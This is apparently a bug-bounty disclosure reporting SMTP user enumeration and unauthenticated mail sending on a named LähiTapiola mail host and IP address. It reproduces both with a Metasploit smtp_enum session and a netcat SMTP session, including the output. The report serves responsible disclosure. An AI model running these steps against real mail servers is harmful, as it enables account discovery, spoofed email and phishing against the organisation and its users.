Hello guys,
I have two related SMTP vulnerabilities. I decided to put both of them under the same ticket because they are closely related.
Summary:
I discovered two SMTP vulnerabilities on host viestinta.lahitapiola.fi. First it is possible to perform user enumeration. For this you can use metasploit in following way:
msf > use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum) > set RHOSTS 83.150.127.170 RHOSTS => 83.150.127.170 msf auxiliary(smtp_enum) > run [*] 83.150.127.170:25 Banner: 220 viestinta.tapiola.fi ESMTP Postfix [+] 83.150.127.170:25 Users found: , adm, bin, daemon, fax, ftp, games, gdm, gopher, halt, lp, mail, news, nobody, operator, postgres, postmaster, sshd, sync, uucp, webmaster, www [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
With this step we recovered valid users on the system (please note I used the default dictionary which comes with metasploit, I did not attempt to create wordlist which would discover your personal email addresses, to limit number of brute force guesses).
Second vulnerability is the fact an attacker without any authentication can send emails from this SMTP. Email are limited to β@viestinta.lahitapiola.fiβ only. To reproduce you can use NetCat utility:
root@kali:~/Android/Sdk/tools# nc -nvv 83.150.127.170 25 (UNKNOWN) [83.150.127.170] 25 (smtp) open 220 viestinta.tapiola.fi ESMTP Postfix HELO 83.150.127.170 250 viestinta.tapiola.fi MAIL FROM:<[email protected]> 250 2.1.0 Ok RCPT TO:<[email protected]> 550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table RCPT TO:<[email protected]> 550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table RCPT TO:<[email protected]> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> test . 250 2.0.0 Ok: queued as 98F9E3F201A1 421 4.4.2 viestinta.tapiola.fi Error: timeout exceeded sent 211, rcvd 481
In NetCat session above you can see I used fake email address [email protected] to send email to [email protected] (we discovered this is valid target in step one - user enumeration). You can see the difference when I tried to send an email to address which does not exist β<[email protected]>: Recipient address rejected: User unknown in local recipient tableβ.
From my point of view there are a few problems:
Domain: viestinta.tapiola.fi
https://pentestlab.wordpress.com/2012/11/20/smtp-user-enumeration/ - about SMTP user enumeration